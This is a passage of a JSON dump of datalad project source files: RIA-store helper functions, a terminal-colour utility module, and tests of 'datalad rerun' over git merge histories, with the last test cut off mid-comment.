ria+file:///path/to/store\n\n Parameters\n ----------\n url : str\n URL to verify an decode.\n cfg : dict-like\n Configuration settings for rewrite_url()\n\n Raises\n ------\n ValueError\n\n Returns\n -------\n tuple\n (host, base-path, rewritten url)\n `host` is not just a hostname, but is a stub URL that may also contain\n username, password, and port, if specified in a given URL.\n `base-path` is the unquoted path component of the url\n \"\"\"\n from datalad.config import rewrite_url\n from datalad.support.network import URL\n\n if not url:\n raise ValueError(\"Got no URL\")\n\n url = rewrite_url(cfg, url)\n url_ri = URL(url)\n if not url_ri.scheme.startswith('ria+'):\n raise ValueError(\"Missing ria+ prefix in final URL: %s\" % url)\n if url_ri.fragment:\n raise ValueError(\n \"Unexpected fragment in RIA-store URL: %s\" % url_ri.fragment)\n protocol = url_ri.scheme[4:]\n if protocol not in ['ssh', 'file', 'http', 'https']:\n raise ValueError(\"Unsupported protocol: %s. 
\"\n \"Supported: ssh, file, http(s)\" %\n protocol)\n\n host = '{proto}://{user}{pdlm}{passwd}{udlm}{host}{portdlm}{port}'.format(\n proto=protocol,\n user=url_ri.username or '',\n pdlm=':' if url_ri.password else '',\n passwd=url_ri.password or '',\n udlm='@' if url_ri.username else '',\n host=url_ri.hostname or '',\n portdlm=':' if url_ri.port else '',\n port=url_ri.port or '',\n )\n # this ``!= 'file'´´ is critical behavior, if removed, it will ruin the IO\n # selection in ORARemote!!\n return host if protocol != 'file' else None, url_ri.path or '/', url\n\n\ndef _ensure_version(io, base_path, version):\n \"\"\"Check a store or dataset version and make sure it is declared\n\n Parameters\n ----------\n io: SSHRemoteIO or LocalIO\n base_path: Path\n root path of a store or dataset\n version: str\n target layout version of the store (dataset tree)\n \"\"\"\n version_file = base_path / 'ria-layout-version'\n if io.exists(version_file):\n existing_version = io.read_file(version_file).split('|')[0].strip()\n if existing_version != version.split('|')[0]:\n # We have an already existing location with a conflicting version on\n # record.\n # Note, that a config flag after pipe symbol is fine.\n raise ValueError(\"Conflicting version found at target: {}\"\n .format(existing_version))\n else:\n # already exists, recorded version fits - nothing to do\n return\n # Note, that the following does create the base-path dir as well, since\n # mkdir has parents=True:\n io.mkdir(base_path)\n io.write_file(version_file, version)\n\n\ndef create_store(io, base_path, version):\n \"\"\"Helper to create a RIA store\n\n Note, that this is meant as an internal helper and part of intermediate\n RF'ing. Ultimately should lead to dedicated command or option for\n create-sibling-ria.\n\n Parameters\n ----------\n io: SSHRemoteIO or LocalIO\n Respective execution instance.\n Note: To be replaced by proper command abstraction\n base_path: Path\n root path of the store\n version: str\n layout version of the store (dataset tree)\n \"\"\"\n\n # At store level the only version we know as of now is 1.\n if version not in known_versions_dst:\n raise UnknownLayoutVersion(\"RIA store layout version unknown: {}.\"\n \"Supported versions: {}\"\n .format(version, known_versions_dst))\n _ensure_version(io, base_path, version)\n error_logs = base_path / 'error_logs'\n io.mkdir(error_logs)\n\n\ndef create_ds_in_store(io, base_path, dsid, obj_version, store_version,\n alias=None, init_obj_tree=True):\n \"\"\"Helper to create a dataset in a RIA store\n\n Note, that this is meant as an internal helper and part of intermediate\n RF'ing. 
Ultimately should lead to a version option for create-sibling-ria\n in conjunction with a store creation command/option.\n\n Parameters\n ----------\n io: SSHRemoteIO or LocalIO\n Respective execution instance.\n Note: To be replaced by proper command abstraction\n base_path: Path\n root path of the store\n dsid: str\n dataset id\n store_version: str\n layout version of the store (dataset tree)\n obj_version: str\n layout version of the dataset itself (object tree)\n alias: str, optional\n alias for the dataset in the store\n init_obj_tree: bool\n whether or not to create the base directory for an annex objects tree (\n 'annex/objects')\n \"\"\"\n\n # TODO: Note for RF'ing, that this is about setting up a valid target\n # for the special remote not a replacement for create-sibling-ria.\n # There's currently no git (bare) repo created.\n\n try:\n # TODO: This is currently store layout version!\n # Too entangled by current get_layout_locations.\n dsgit_dir, archive_dir, dsobj_dir = \\\n get_layout_locations(int(store_version), base_path, dsid)\n except ValueError as e:\n raise UnknownLayoutVersion(str(e))\n\n if obj_version not in known_versions_objt:\n raise UnknownLayoutVersion(\"Dataset layout version unknown: {}. \"\n \"Supported: {}\"\n .format(obj_version, known_versions_objt))\n\n _ensure_version(io, dsgit_dir, obj_version)\n\n io.mkdir(archive_dir)\n if init_obj_tree:\n io.mkdir(dsobj_dir)\n if alias:\n alias_dir = base_path / \"alias\"\n io.mkdir(alias_dir)\n try:\n # go for a relative path to keep the alias links valid\n # when moving a store\n io.symlink(\n Path('..') / dsgit_dir.relative_to(base_path),\n alias_dir / alias)\n except FileExistsError:\n lgr.warning(\"Alias %r already exists in the RIA store, not adding an \"\n \"alias.\", alias)\n" }, { "alpha_fraction": 0.5762974619865417, "alphanum_fraction": 0.5852052569389343, "avg_line_length": 25.89583396911621, "blob_id": "ea3cfb2d32378e59649f8cc37f37318fd475b168", "content_id": "1c7beaf30eb0dc379ae314f9f21c32581392a73f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2582, "license_type": "permissive", "max_line_length": 87, "num_lines": 96, "path": "/datalad/support/ansi_colors.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Definitions for ansi colors etc\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nfrom typing import Optional\n\nfrom .. 
import cfg\nfrom ..ui import ui\n\nBLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(30, 38)\nBOLD = 1\nUNDERLINE = 4\n\nRESET_SEQ = \"\\033[0m\"\nCOLOR_SEQ = \"\\033[1;%dm\"\nBOLD_SEQ = \"\\033[1m\"\n\nLOG_LEVEL_COLORS = {\n 'WARNING': YELLOW,\n 'INFO': None,\n 'DEBUG': BLUE,\n 'CRITICAL': YELLOW,\n 'ERROR': RED\n}\n\nRESULT_STATUS_COLORS = {\n 'ok': GREEN,\n 'notneeded': GREEN,\n 'impossible': YELLOW,\n 'error': RED\n}\n\n# Aliases for uniform presentation\n\nDATASET = UNDERLINE\nFIELD = BOLD\n\n\ndef color_enabled() -> bool:\n \"\"\"Check for whether color output is enabled\n\n If the configuration value ``datalad.ui.color`` is ``'on'`` or ``'off'``,\n that takes precedence.\n If ``datalad.ui.color`` is ``'auto'``, and the environment variable\n ``NO_COLOR`` is defined (see https://no-color.org), then color is disabled.\n Otherwise, enable colors if a TTY is detected by ``datalad.ui.ui.is_interactive``.\n\n Returns\n -------\n bool\n \"\"\"\n ui_color = cfg.obtain('datalad.ui.color')\n return (ui_color == 'on' or\n ui_color == 'auto' and os.getenv('NO_COLOR') is None and ui.is_interactive)\n\n\ndef format_msg(fmt: str, use_color: bool = False) -> str:\n \"\"\"Replace $RESET and $BOLD with corresponding ANSI entries\"\"\"\n if color_enabled() and use_color:\n return fmt.replace(\"$RESET\", RESET_SEQ).replace(\"$BOLD\", BOLD_SEQ)\n else:\n return fmt.replace(\"$RESET\", \"\").replace(\"$BOLD\", \"\")\n\n\ndef color_word(s: str, color: Optional[int], force: bool = False) -> str:\n \"\"\"Color `s` with `color`.\n\n Parameters\n ----------\n s : string\n color : int\n Code for color. If the value evaluates to false, the string will not be\n colored.\n force : boolean, optional\n Color string even when non-interactive session is detected.\n\n Returns\n -------\n str\n \"\"\"\n if color and (force or color_enabled()):\n return \"%s%s%s\" % (COLOR_SEQ % color, s, RESET_SEQ)\n return s\n\n\ndef color_status(status: str) -> str:\n return color_word(status, RESULT_STATUS_COLORS.get(status))\n" }, { "alpha_fraction": 0.4776795506477356, "alphanum_fraction": 0.4814685881137848, "avg_line_length": 28.665374755859375, "blob_id": "c75fc6e7cc474f6b854200d4f3287d9feddf704b", "content_id": "5de6e5ca90565b5ab5d9473eedc889f41614bf28", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22961, "license_type": "permissive", "max_line_length": 87, "num_lines": 774, "path": "/datalad/local/tests/test_rerun_merges.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test `datalad rerun` on histories with merges.\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os.path as op\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n assert_false,\n eq_,\n neq_,\n ok_,\n skip_if_adjusted_branch,\n slow,\n with_tempfile,\n)\n\n# Notation in graphs:\n#\n# The initial graph is made up of the following commits:\n#\n# - x_n: commit x without a run command\n# - x_r: commit x with a run command\n#\n# When re-executing 
a command creates a new commit, it is labeled as one of the\n# following:\n#\n# - x_C: cherry picked\n# - x_M: merge commit\n# - x_R: run commit\n\n\n@slow\n@with_tempfile(mkdir=True)\ndef test_rerun_fastforwardable(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\", \"--no-ff\"])\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o c_M\n # |\\\n # | o b_R\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n ok_(ds_repo.commit_exists(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_r\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha())\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n eq_(ds_repo.get_active_branch(), DEFAULT_BRANCH)\n eq_(hexsha_before,\n ds_repo.get_hexsha())\n\n\n@slow\n@with_tempfile(mkdir=True)\ndef test_rerun_fastforwardable_mutator(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\", \"--no-ff\"])\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_R\n # o b_r\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha())\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o c_n\n # |\\\n # | o b_r\n # |/\n # o a_n\n eq_(ds_repo.get_active_branch(), DEFAULT_BRANCH)\n assert_false(ds_repo.commit_exists(DEFAULT_BRANCH + \"^2\"))\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_left_right_runs(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.run(\"echo bar >bar\")\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # o | c_R\n # | o b_R\n # |/\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^\")\n # o d_M\n # |\\\n # | o b_R\n # |/\n # o c_r\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted 
branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_run_left_mutator_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo ichange >>ichange\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.run(\"echo idont >idont\")\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(hexsha_before),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_nonrun_left_run_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n with open(op.join(path, \"nonrun-file\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # | o c_r\n # o | b_n\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_R\n # o | b_n\n # |/\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o d_n\n # |\\\n # | o c_r\n # o | b_n\n # |/\n # o a_n\n ok_(ds_repo.get_active_branch() is None)\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_r\n # o | b_n\n # |/\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_run_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n with open(op.join(path, \"nonrun-file\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_n\n # o | b_R\n # |/\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_R\n # o c_n\n # o a_n\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n eq_(hexsha_before, 
ds_repo.get_hexsha())\n\n\n# @slow # ~5sec on Yarik's laptop\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_mutator_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n with open(op.join(path, \"nonrun-file\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o d_n\n # |\\\n # | o c_n\n # o | b_r\n # |/\n # o a_n\n assert_false(ds_repo.commit_exists(DEFAULT_BRANCH + \"^2\"))\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_mutator_stem_nonrun_merges(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n with open(op.join(path, \"nonrun-file0\"), \"w\") as f:\n f.write(\"blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"-b\", \"side\"])\n with open(op.join(path, \"nonrun-file1\"), \"w\") as f:\n f.write(\"more blah\")\n ds.save()\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o e_n\n # |\\\n # | o d_n\n # o | c_n\n # |/\n # o b_r\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o e_M\n # |\\\n # | o d_C\n # o | c_C\n # |/\n # o b_R\n # o a_n\n ok_(ds_repo.commit_exists(\"HEAD^2\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o c_C\n # o b_R\n # o d_n\n # o b_r\n # o a_n\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n eq_(ds_repo.get_hexsha(\"HEAD~2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o e_n\n # |\\\n # | o d_n\n # o | c_n\n # |/\n # o b_r\n # o a_n\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n\n\n# @slow # ~4.5sec\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_exclude_side(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.run(\"echo bar >bar\")\n ds_repo.merge(\"side\", options=[\"-m\", \"Merge side\"])\n # o d_n\n # |\\\n # o | c_r\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(\"HEAD\", since=DEFAULT_BRANCH + \"^2\", onto=\"\")\n # o d_M\n # |\\\n # o | c_R\n # | o b_r\n # |/\n # o a_n\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"),\n ds_repo.get_hexsha(\"HEAD^2\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef 
test_rerun_unrelated_run_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_n\n # o b_R\n # o a_n\n neq_(ds_repo.get_hexsha(\"HEAD^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n eq_(ds_repo.get_hexsha(\"HEAD^2\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o b_R\n # o c_n\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n eq_(ds_repo.get_hexsha(\"HEAD^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n\n\n# @slow # ~3.5sec on Yarik's laptop\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_unrelated_mutator_left_nonrun_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH + \"~\", options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o b_R\n # o d_n\n # |\\\n # | o c_n\n # o b_r\n # o a_n\n eq_(hexsha_before,\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"))\n\n\n@slow\n@with_tempfile(mkdir=True)\ndef test_rerun_unrelated_nonrun_left_run_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o d_M\n # |\\\n # | o c_R\n # | o b_n\n # o a_n\n ok_(ds_repo.commit_exists(\"HEAD^2\"))\n neq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^\"),\n ds_repo.get_hexsha(\"HEAD^\"))\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2^\"),\n ds_repo.get_hexsha(\"HEAD^2^\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2^^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n eq_(ds_repo.get_hexsha(DEFAULT_BRANCH),\n ds_repo.get_hexsha())\n assert_false(ds_repo.commit_exists(\"HEAD^2^^\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n eq_(hexsha_before, ds_repo.get_hexsha())\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef 
test_rerun_unrelated_nonrun_left_mutator_right(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\", \"side\"])\n ds.save(message=\"squashed\")\n ds.run(\"echo foo >>foo\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\",\n options=[\"-m\", \"Merge side\", \"--allow-unrelated-histories\"])\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n\n ds.rerun(since=\"\", onto=DEFAULT_BRANCH + \"^2\")\n # o d_M\n # |\\\n # | o c_R\n # | o c_r\n # | o b_n\n # o a_n\n eq_(ds_repo.get_hexsha(\"HEAD^2^\"),\n ds_repo.get_hexsha(DEFAULT_BRANCH + \"^2\"))\n assert_false(ds_repo.commit_exists(\"HEAD^2~3\"))\n\n ds_repo.checkout(DEFAULT_BRANCH)\n hexsha_before = ds_repo.get_hexsha()\n ds.rerun(since=\"\")\n # o c_R\n # o d_n\n # |\\\n # | o c_r\n # | o b_n\n # o a_n\n eq_(ds_repo.get_hexsha(\"HEAD^\"),\n hexsha_before)\n assert_false(ds_repo.commit_exists(\"HEAD^2\"))\n\n\n@slow\n# test implementation requires checkout of non-adjusted branch\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_rerun_multifork(path=None):\n ds = Dataset(path).create()\n # keep direct repo accessor to speed things up\n ds_repo = ds.repo\n ds_repo.checkout(DEFAULT_BRANCH, options=[\"-b\", \"side\"])\n ds.run(\"echo foo >foo\")\n ds_repo.checkout(\"side\", options=[\"-b\", \"side-nonrun\"])\n with open(op.join(path, \"nonrun-file0\"), \"w\") as f:\n f.write(\"blah 0\")\n ds.save()\n ds_repo.checkout(\"side\")\n with open(op.join(path, \"nonrun-file1\"), \"w\") as f:\n f.write(\"blah 1\")\n ds.save()\n ds.run(\"echo bar >bar\")\n ds_repo.checkout(\"side~1\", options=[\"-b\", \"side-side\"])\n with open(op.join(path, \"nonrun-file2\"), \"w\") as f:\n f.write(\"blah 2\")\n ds.save()\n ds.run(\"echo onside0 >onside0\")\n ds_repo.checkout(\"side\")\n ds_repo.merge(\"side-side\")\n ds.run(\"echo after-side-side >after-side-side\")\n ds_repo.checkout(DEFAULT_BRANCH)\n ds_repo.merge(\"side\", options=[\"--no-ff\"])\n ds_repo.merge(\"side-nonrun\")\n # o k_n\n # |\\\n # | o j_n\n # o | i_n\n # |\\ \\\n # | o | h_r\n # | o | g_n\n # | |\\ \\\n # | | o | f_r\n # | | o | e_n\n # | o | | d_r\n # | |/ /\n # | o | c_n\n # | |/\n # | o b_r\n # |/\n # o a_n\n\n ds.rerun(since=\"\", onto=\"\")\n # o k_M\n # |\\\n # | o j_n\n # o | i_M\n # |\\ \\\n # | o | h_R\n # | o | g_M\n # | |\\ \\\n # | | o | f_R\n # | | o | e_n\n # | o | | d_R\n # | |/ /\n # | o | c_n\n # | 